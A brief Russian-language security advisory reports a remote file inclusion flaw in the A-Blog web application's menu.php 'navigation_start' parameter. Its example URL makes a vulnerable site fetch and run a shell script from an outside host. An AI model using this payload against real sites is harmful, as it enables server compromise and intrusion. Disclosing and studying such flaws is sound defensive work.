Программа: A-Blog
Обнаруженная уязвимость может быть использована злоумышленником для выполнения произвольного кода. Уязвимость существует из-за того, что входные данные, передаваемые через параметр "navigation_start" не правильно обрабатываются в menu.php.
Пример:
http://www.site.com/ablog_dir/navigation/menu.php?navigation_start =http://marcusbestlamer.gay/shell.php?